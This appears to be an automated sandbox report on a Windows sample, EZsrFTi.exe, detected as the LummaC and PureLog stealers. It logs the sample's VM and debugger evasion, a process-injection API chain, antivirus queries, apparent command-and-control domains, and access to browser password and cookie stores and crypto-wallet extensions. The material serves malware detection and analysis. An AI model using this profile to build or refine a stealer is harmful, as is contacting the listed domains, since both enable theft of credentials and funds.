Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\EZsrFTi.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\EZsrFTi.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\EZsrFTi.exe	Memory allocated: CA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Memory allocated: 29E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Memory allocated: 1070000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\EZsrFTi.exe

Window / User API: threadDelayed 6985

Jump to behavior

Source: C:\Users\user\Desktop\EZsrFTi.exe TID: 7756	Thread sleep time: -180000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe TID: 8100	Thread sleep count: 6985 > 30			Jump to behavior

Source: C:\Users\user\Desktop\EZsrFTi.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\EZsrFTi.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\EZsrFTi.exe	Last function: Thread delayed

Source: Amcache.hve.7.dr	Binary or memory string: VMware
Source: Amcache.hve.7.dr	Binary or memory string: VMware-42 27 b7 a3 1e b0 86 f3-0a fe 06 07 d0 80 07 92
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.7.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.7.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.7.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: EZsrFTi.exe, 00000004.00000002.2539201362.0000000001439000.00000004.00000020.00020000.00000000.sdmp, EZsrFTi.exe, 00000004.00000002.2538762333.00000000013FC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.7.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.7.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.7.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.7.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.7.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.7.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.7.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.7.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.7.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.7.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\EZsrFTi.exe

API call chain: ExitProcess graph end node

graph_4-13739

Source: C:\Users\user\Desktop\EZsrFTi.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\EZsrFTi.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\EZsrFTi.exe

Code function: 4_2_0043F050 LdrInitializeThunk,

4_2_0043F050

Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 0_2_029E8125 mov edi, dword ptr fs:[00000030h]		0_2_029E8125
Source: C:\Users\user\Desktop\EZsrFTi.exe	Code function: 0_2_029E82A2 mov edi, dword ptr fs:[00000030h]		0_2_029E82A2

Source: C:\Users\user\Desktop\EZsrFTi.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\EZsrFTi.exe

Code function: 0_2_029E8125 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_029E8125

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\EZsrFTi.exe

Memory written: C:\Users\user\Desktop\EZsrFTi.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: EZsrFTi.exe, 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: growthselec.bond
Source: EZsrFTi.exe, 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: immolatechallen.bond
Source: EZsrFTi.exe, 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: crookedfoshe.bond
Source: EZsrFTi.exe, 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: strivehelpeu.bond
Source: EZsrFTi.exe, 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: sobrattyeu.bond

Source: C:\Users\user\Desktop\EZsrFTi.exe	Process created: C:\Users\user\Desktop\EZsrFTi.exe "C:\Users\user\Desktop\EZsrFTi.exe"	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Process created: C:\Users\user\Desktop\EZsrFTi.exe "C:\Users\user\Desktop\EZsrFTi.exe"	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Process created: C:\Users\user\Desktop\EZsrFTi.exe "C:\Users\user\Desktop\EZsrFTi.exe"	Jump to behavior

Source: C:\Users\user\Desktop\EZsrFTi.exe	Queries volume information: C:\Users\user\Desktop\EZsrFTi.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\EZsrFTi.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.7.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: EZsrFTi.exe, 00000004.00000002.2540317254.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: les%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\Desktop\EZsrFTi.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: EZsrFTi.exe PID: 7732, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: EZsrFTi.exe, type: SAMPLE
Source: Yara match	File source: 0.0.EZsrFTi.exe.620000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.EZsrFTi.exe.39e9550.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.EZsrFTi.exe.39e9550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1292054697.0000000000622000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Found many strings related to Crypto-Wallets (likely being stolen)

Source: EZsrFTi.exe, 00000004.00000002.2539201362.0000000001439000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum
Source: EZsrFTi.exe, 00000004.00000002.2539201362.0000000001439000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: EZsrFTi.exe, 00000004.00000002.2539201362.0000000001439000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: EZsrFTi.exe, 00000004.00000002.2539538724.0000000001487000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":0,"fs":20971520},{"t":0,"p":"%
Source: EZsrFTi.exe, 00000004.00000002.2539623279.00000000014A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: EZsrFTi.exe, 00000004.00000002.2539201362.0000000001439000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: EZsrFTi.exe, 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\EZsrFTi.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
